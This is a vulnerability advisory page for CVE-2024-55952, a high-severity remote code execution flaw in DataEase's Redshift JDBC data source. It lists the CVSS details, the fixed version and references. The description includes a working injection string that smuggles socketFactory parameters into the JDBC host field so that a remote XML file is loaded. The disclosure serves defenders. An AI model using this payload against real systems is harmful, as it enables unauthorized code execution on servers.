CVE-2024-55952 HIGH

CVE-2024-55952: Dataease Redshift Data Source JDBC Connection Parameters Not Verified Leads to RCE Vulnerability

Vendor Dataease

Product dataease

Weakness CWE-20 · Input validation

Published December 18, 2024

Last update December 18, 2024

View on NVD All CVEs

CVSS base score

8.6/10

Attack vector Network

Attack complexity Low

Privileges required Low

User interaction None

Confidentiality —

Integrity —

CVSS vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N

What the vulnerability does

01Description

DataEase is an open source business analytics tool. Authenticated users can remotely execute code through the backend JDBC connection. When constructing the jdbc connection string, the parameters are not filtered. Constructing the host as ip:5432/test/?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://ip:5432/1.xml&a= can trigger the ClassPathXmlApplicationContext construction method. The vulnerability has been fixed in v1.18.27. Users are advised to upgrade. There are no known workarounds for this vulnerability.

Key dates

02Disclosure timeline

December 18, 2024 CVE published

December 18, 2024 Record updated

External resources

03References

NVD — National Vulnerability Database https://nvd.nist.gov/vuln/detail/CVE-2024-55952 CWE — Common Weakness Enumeration https://cwe.mitre.org/data/definitions/20.html

Related vulnerabilities

CVE-2024-55952: Dataease Redshift Data Source JDBC Connection Parameters Not Verified Leads to RCE Vulnerability

01Description

02Disclosure timeline

03References

04Related CVE